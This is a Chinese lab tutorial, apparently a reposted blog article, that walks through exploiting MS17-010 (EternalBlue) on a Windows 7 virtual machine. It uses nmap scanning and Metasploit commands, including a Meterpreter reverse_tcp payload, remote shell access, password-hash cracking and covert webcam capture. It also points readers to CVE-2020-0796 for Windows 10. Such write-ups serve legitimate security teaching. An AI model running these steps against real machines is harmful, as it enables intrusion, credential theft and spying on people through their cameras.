主机漏洞利用演示MS17-010(永恒之蓝)

这篇具有很好参考价值的文章主要介绍了主机漏洞利用演示MS17-010(永恒之蓝)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ms17-010危害:对被攻击方的电脑造成蓝屏!

申明:本篇文章的用意仅做学习使用

网络搭建环境:

软件:Vmware Workstation 17

攻击机:Kali

靶机环境:Windows 7

Nmap软件的基本功能:

1、主机发现(Host Discovery)

2、端口扫描(Port Scanning)

3、版本侦测(Version Detection)

4、操作系统侦测(Operating System Detection)

Nmap优点:

1、灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描。

2、强大:Nmap可以用于扫描互联网上大规模的计算机。

3、可移植:支持主流的操作系统:windows/Linux/Mac OS等

4、简单:提供默认的操作能覆盖大部分功能,基本端口扫描。

5、自由:Nmap是一款开源软件,在GPL License的范围内可以自由使用。

6、社区支持:Nmap是一款开源软件,背后有强大的社区团队支持。

Nmap常用的扫描命令

1、完整的全面扫描

命令为:nmap -T4 -A -v ip

-A  选项用于使用进攻性(Aggressive)方式扫描;

-T4 指定扫描过程使用的时序(Timing),总共有6个级别(0 - 5),级别越高,速度越快,但也容易被防火墙发现。

-v 表示显卡冗余(verbosity)信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态。

2、扫描多台主机

命令为:nmap ***.***.***.1 ***.***.***.2 ***.***.***.3

3、扫描整个子网

命令为:nmap 192.168.64.*

Nmap常用扫描命令

-sT :TCP connect扫描

-sS :TCP SYN扫描

-sF/-sX/-sN :通过发送一些特殊的标志位以避开设备或软件的检测

-sP :通过发送ICMP echo请求探测主机是否存活,原理同ping

-sU :探测目标主机开放了哪些UDP端口

-sA :TCP ACK扫描,对防火墙上未屏蔽的端口进行探测

-sV :获取对呀端口上更为详细的服务版本信息

-Pn :在扫描之前,不发送ICMP echo请求测试目标是否存活

-o :启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息

-F :快速扫描模式,只扫描在nmap-services中列出的端口

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全 

介绍完Nmap扫描工具后,下面来进行MS17-010的实验!

MS17-010漏洞攻击

漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞

Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定的安全风险。

Microsoft Windows Server 2016 、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

 MS17-010漏洞攻击实验过程:

第1步:使用nmap -T4 -A -v -Pn 192.168.64.1/24 扫描Windows 7客户端的端口有哪些是开放的

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

可以看到这台电脑有很多端口是开放的,比如SMB的445端口

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 第2步:启用msf 渗透工具

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 第3步:搜索ms17-010(下面显示的)

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

第4步:选择use 3 的攻击模块(进行辅助扫描,确定漏洞是否存在)

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

第5步:使用show options命令查看设置(配置)

RHOSTS:这一项是填写目标(被攻击方)主机的IP地址

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

set rhosts 192.168.64.129 (确定目标(Windows 7的IP地址))

use 0 利用smb协议溢出漏洞的缺陷攻击Windows的操作系统(漏洞名称:ms17-010)

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

set rhosts 192.168.64.129   设置被攻击方的IP地址

set payload windows/x64/meterpreter/reverse_tcp  设置攻击载荷模块

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

getuid   查看当前的系统用户id权限

shell   进入被攻击方的DOS界面

exit    退出被攻击方的DOS界面

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 可以看到Windows 7的密码是以md5加密方式显示的

解密网站:https://www.cmd5.com

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

这里演示上传一张图片到Windows7系统

主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

注意:我做实验的环境是在Vmware虚拟机,需要在虚拟机上设置允许获取物理机的摄像头权限

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

虚拟机右下方Chicony Integrated Camera的设备亮绿灯就表示虚拟机已经连接上物理机摄像头主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

开启摄像头

webcam_list    查看摄像头

webcam_snap  通过摄像头拍照

webcam_stream  通过摄像头开启视频

 主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 下面使用webcam_stream开启了摄像头的视频功能(摄像头的视频画面不便展示)主机漏洞利用演示MS17-010(永恒之蓝),网络运维,网络安全

 到这里MS17-010的实验就算结束了。

此实验只针对在Windows7系统上做MS17-010(永恒之蓝),在Windows 10操作系统上已经不存在MS17-010的漏洞了,如果要进行漏洞尝试,请尝试CVE-2020-0796(永恒之黑)。文章来源地址https://www.toymoban.com/news/detail-606940.html

到了这里,关于主机漏洞利用演示MS17-010(永恒之蓝)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(41)
  • MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)                              2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作 :

    2024年02月08日
    浏览(49)
  • MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令“msfconsole ”,启动Metasploit;输入命令“use auxiliary/scanner/smb/smb_ms17_010”,加载扫描模块;输入命令“set RHOSTS 192.168.0.6”,设置需要被扫描的目标主机地址;输入命令“run”,进行扫描并观察是否存在该漏洞   输入命令“

    2024年02月05日
    浏览(53)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(74)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(37)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(48)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(52)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(39)
  • 永恒之蓝漏洞 ms17_010 详解

    永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企

    2024年02月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包